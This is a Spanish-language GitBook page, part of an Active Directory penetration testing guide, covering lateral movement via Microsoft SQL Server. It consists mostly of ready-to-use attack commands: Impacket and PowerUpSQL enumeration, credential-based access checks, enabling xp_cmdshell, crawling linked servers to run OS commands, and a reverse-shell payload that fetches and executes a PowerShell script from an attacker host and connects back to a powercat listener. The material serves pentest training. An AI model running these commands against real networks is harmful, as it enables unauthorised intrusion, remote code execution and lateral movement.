馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina
  • Linux/Unix
  • Impacket
  • Windows
  • PowerUpSQL

驴Te fue 煤til?

  1. Movimiento lateral

Microsoft SQL Server (MSSQL)

Linux/Unix

Impacket

# impacket-mssqlclient
mssqlclient.py <ACME.LOCAL>/<user>:"<password>"@<target> -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami

Windows

PowerUpSQL

Descubrir instancias de SQL Server.

Get-SQLInstanceDomain

Obtener informaci贸n de instancias de SQL Server.

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Comprobar acceso a instancias de SQL Server dado un usuario y contrase帽a.

$SQLInstances = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -Username "<ACME.LOCAL>\<user>" -Password "<password>" | Where-Object {$_.Status -like "Accessible"}
$SQLInstances

Comprobar acceso a instancias de SQL Server utilizando la cuenta de usuario actual.

$SQLInstances = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
$SQLInstances

Ejecuci贸n de consultas SQL.

Get-SQLQuery -Verbose -Instance "<target>,<port>" -Query "SELECT @@version"
Get-SQLQuery -Verbose -Instance "<target>,<port>" -Username "<ACME.LOCAL>\<user>" -Password "<password>" -Query "SELECT @@version"

Obtener links de bases de datos.

Get-SQLServerLink -Instance "<Instance>" -Verbose

Rastrear links de bases de datos.

Get-SQLServerLinkCrawl -Instance "<Instance>" -Verbose

Ejecuci贸n de comandos utilizando links de bases de datos.

Get-SQLServerLinkCrawl -Instance "<Instance>" -Query "exec master..xp_cmdshell 'hostname & whoami'"

Reverse shell utilizando links de bases de datos.

# Powercat
powercat -l -v -p <listen-port>
# PowerUpSQL
Get-SQLServerLinkCrawl -Instance "<Instance>" -Query "exec master..xp_cmdshell 'powershell.exe IEX (iwr http://<attacker-IP-address>:80/Invoke-PowerShellTcp.ps1 -UseBasicParsing); Invoke-PowerShellTcp -Reverse -IPAddress <attacker-IP-address> -Port <listen-port>'"

AnteriorUser huntingSiguientePowerShell remoting

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?